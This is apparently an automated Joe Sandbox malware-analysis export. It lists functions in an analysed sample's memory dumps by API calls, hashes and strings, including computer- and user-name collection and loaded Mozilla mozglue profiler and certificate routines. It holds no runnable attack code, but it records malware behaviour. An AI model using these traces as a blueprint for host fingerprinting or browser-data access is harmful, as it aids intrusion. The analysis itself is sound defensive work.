Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 19a95661a882d746697f83a076fa6ca66684e95984252c46abc5f6fe8f4f035c
Instruction ID: e199fad4823c76c8dcd3508d8d721d362d694860c8b59ab14883db43bdc3afaf
Opcode Fuzzy Hash: 19a95661a882d746697f83a076fa6ca66684e95984252c46abc5f6fe8f4f035c
Instruction Fuzzy Hash: A1F0E2B1641208BBE7149AA8AC49FEFB7E8E705B15F300458F904E3280D9B19E40DBA4

Function 00058D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,00041B54,?,?,0006564C,?,?,00060E1F), ref: 00058D9F

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7d30baf0b3232a50e7790d7b06df5339e1034db684086f96fb27fee13619ceb3
Instruction ID: 888d0ae26c326b95832c0a8a852c25eb93e77a5fb697c04306ca1aab4545f817
Opcode Fuzzy Hash: 7d30baf0b3232a50e7790d7b06df5339e1034db684086f96fb27fee13619ceb3
Instruction Fuzzy Hash: 5AF01570D00208EBCB00EFA4D5496EEBBB4EB11312F108299EC266B2C1EB345A59DF81

Function 00058DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00058E0B

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: d42fcc1bbac7025dd32a69805da7fe8ee4e903404d85d0cf66d29a38bf2430bc
Instruction ID: 1f86f2577ba21b4cd1e33ba8424d5bee5178ae49269a9e035dcf004437b2bbf8
Opcode Fuzzy Hash: d42fcc1bbac7025dd32a69805da7fe8ee4e903404d85d0cf66d29a38bf2430bc
Instruction Fuzzy Hash: A8E01235A4034C6BDB51DB50DC96FEE777C9B44B01F004295BE0C5A1C1DE70AB858B91

Function 00041190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 000578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00057910
Part of subcall function 000578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00057917
Part of subcall function 000578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0005792F

Part of subcall function 00057850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000411B7), ref: 00057880
Part of subcall function 00057850: RtlAllocateHeap.NTDLL(00000000), ref: 00057887
Part of subcall function 00057850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0005789F

ExitProcess.KERNEL32 ref: 000411C6

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: a9f52becacff4cd501ba623beb156d5882cde97513ab37b6331c7f8b8f1d640a
Instruction ID: f5dd5606c0b0d8fb028be5b5ca209e6d156c7705071eedc21b3ca1b1e2f4129d
Opcode Fuzzy Hash: a9f52becacff4cd501ba623beb156d5882cde97513ab37b6331c7f8b8f1d640a
Instruction Fuzzy Hash: 1CE0ECB995520153EE0073B0BC0ABAB329C5B14346F044825BE09A2513FE29E84497AA

Function 00058E30 Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,-00000001), ref: 00058E52

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 466c97f83c64405180974ac50176b7cb8c549e54d505616f2fd8ac89909ee69c
Instruction ID: 944b175f00336bb8e42edffe0b2e58e3feff61beb748bab309e10716adaa7fab
Opcode Fuzzy Hash: 466c97f83c64405180974ac50176b7cb8c549e54d505616f2fd8ac89909ee69c
Instruction Fuzzy Hash: B601E434A04108EBDB14CF98C58ABADBBB1EF04309F28C088ED056B390C7756E88DF95

Non-executed Functions

Function 6C665440 Relevance: 138.8, APIs: 54, Strings: 25, Instructions: 587threadtimeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C665492
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6654A8
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6654BE
__Init_thread_footer.LIBCMT ref: 6C6654DB

Part of subcall function 6C68AB3F: EnterCriticalSection.KERNEL32(6C6DE370,?,?,6C653527,6C6DF6CC,?,?,?,?,?,?,?,?,6C653284), ref: 6C68AB49
Part of subcall function 6C68AB3F: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C653527,6C6DF6CC,?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68AB7C

Part of subcall function 6C68CBE8: GetCurrentProcess.KERNEL32(?,6C6531A7), ref: 6C68CBF1
Part of subcall function 6C68CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6531A7), ref: 6C68CBFA

GetCurrentThreadId.KERNEL32 ref: 6C6654F9
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C665516
GetCurrentThreadId.KERNEL32 ref: 6C66556A
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C665577
moz_xmalloc.MOZGLUE(00000070), ref: 6C665585
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C665590
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6C6655E6
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C665606
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C665616

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

GetCurrentThreadId.KERNEL32 ref: 6C66563E
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C665646
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C66567C
free.MOZGLUE(?), ref: 6C6656AE

Part of subcall function 6C675E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C675EDB
Part of subcall function 6C675E90: memset.VCRUNTIME140(ewkl,000000E5,?), ref: 6C675F27
Part of subcall function 6C675E90: LeaveCriticalSection.KERNEL32(?), ref: 6C675FB2

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6C6656E8
GetCurrentThreadId.KERNEL32 ref: 6C665707
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6C66570F
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6C665729
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6C66574E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6C66576B
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6C665796
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6C6657B3
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6C6657CA

Strings

MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C6657AE
MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C665749
- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C665D2B
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C665AC9
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C6654B9
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C6654A3
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C665791
- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C665D24
[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C665B38
[I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C665717
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C6657C5
MOZ_BASE_PROFILER_HELP, xrefs: 6C665511
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C66548D
- MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C665CF9
[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C665C56
MOZ_PROFILER_STARTUP, xrefs: 6C6655E1
[I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C665BBE
- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C665D1C
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C665766
MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C6656E3
GeckoMain, xrefs: 6C665554, 6C6655D5
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C66584E
- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C665D01
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C665724
[I %d/%d] profiler_init, xrefs: 6C66564E

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
API String ID: 3686969729-1266492768
Opcode ID: 9723cfc490d2767776d13f6d4db7c8a092534f89ff03e26e62870104a5c6f412
Instruction ID: 177a8c64f2d46a8a752f75fa61e52c8de68fafea378d92d8cf6f77fefddd9d63
Opcode Fuzzy Hash: 9723cfc490d2767776d13f6d4db7c8a092534f89ff03e26e62870104a5c6f412
Instruction Fuzzy Hash: 2D2205709043419FDB009F76C89666ABBB5AF8734CF04462AE94A87F42EB31E445CB5F

Function 6C666C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C666CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C666D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6C666D26

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C666D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C666D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C666D73
free.MOZGLUE(00000000), ref: 6C666D80
CertGetNameStringW.CRYPT32 ref: 6C666DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6C666DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C666DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C666DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6C666E10
CryptMsgClose.CRYPT32(00000000), ref: 6C666E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6C666E34
CreateFileW.KERNEL32 ref: 6C666EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6C666F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C666F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C66709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C667103
free.MOZGLUE(00000000), ref: 6C667153
CloseHandle.KERNEL32(?), ref: 6C667176
__Init_thread_footer.LIBCMT ref: 6C667209
__Init_thread_footer.LIBCMT ref: 6C66723A
__Init_thread_footer.LIBCMT ref: 6C66726B
__Init_thread_footer.LIBCMT ref: 6C66729C
__Init_thread_footer.LIBCMT ref: 6C6672DC
__Init_thread_footer.LIBCMT ref: 6C66730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C6673C2
VerSetConditionMask.NTDLL ref: 6C6673F3
VerSetConditionMask.NTDLL ref: 6C6673FF
VerSetConditionMask.NTDLL ref: 6C667406
VerSetConditionMask.NTDLL ref: 6C66740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C66741A
moz_xmalloc.MOZGLUE(?), ref: 6C66755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C667568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C667585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C667598
free.MOZGLUE(00000000), ref: 6C6675AC

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

Strings

SHA256, xrefs: 6C666EC0
wintrust.dll, xrefs: 6C6672CD
(, xrefs: 6C66768A
CryptCATAdminReleaseCatalogContext, xrefs: 6C6672C8

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: 7fc89b314fb4aa2afe388c52032a03451903b56d09fef3437752505b54f425da
Instruction ID: 66a7cec88e3af785e2294924bd49185265c2d8ef4da158a834f2fe8299d93b89
Opcode Fuzzy Hash: 7fc89b314fb4aa2afe388c52032a03451903b56d09fef3437752505b54f425da
Instruction Fuzzy Hash: 9852E871A042149FEB21DF26CC84BAA77B8EF46704F144599E909A7A40DB70BF84CF5A

Function 6C690DD0 Relevance: 83.9, APIs: 36, Strings: 10, Instructions: 3368COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C690F1F
LeaveCriticalSection.KERNEL32(?), ref: 6C690F99
memcpy.VCRUNTIME140(?,?,?), ref: 6C690FB7
EnterCriticalSection.KERNEL32(?), ref: 6C690FE9
